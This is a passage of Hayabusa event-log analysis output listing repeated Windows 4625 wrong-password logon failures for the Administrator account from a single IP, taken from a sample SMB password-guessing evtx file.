01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNoInpFTsixZDIu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ladJUS6I0HMIwdef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oW63pJlVtjgn3YY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKNu8b2To2Y1twUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9sN5xm3GytfmM7G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtQQS61GYBm6WUUz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WxxawZZMhNCGHxc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sKP8G2VgJlrr9LMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvOsNQpk3c5p1FgK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7oz7NPh5Z8UrDPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvzNFOLBlBv98Do4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8KJmYytO30Icc6Rb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zro3jLjFXWZ2o8VL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Z2J8VYeuxd9fKcG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXMjOKLfMex7OmMv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgbm3YeoGxCa22Il : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7MEstBFjiWhVE18 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y8Y2kDEiMZWf0znn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBAFVgPIOyCvtdRs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s3pFhUcspF6lzQXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39LFXXW715pQoADC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: in4ewyxouUnxQzCQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zOtV8CLIU6Mcw2ty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8NJqimhGrg9uhTh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XEWLTOY9magV0h6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Di1MZsJx52Bi8E6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22MdB2QodynfibkF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qojej3YITXvXJ6Pe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CLjbQ6timbdQoufd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aZgoAnGEFwXN88bQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZFWoL9XUMJdfNnY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x000TRnXfVtPAQSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNHWWHDOpXQyNdrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1irbPdOoUfvq1MXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dCflbKOMPJRXQHsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zuy6nD4EXeGzEy5e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xkig4u0LIS9v3HMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94RbUrUcMf6VhP8A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 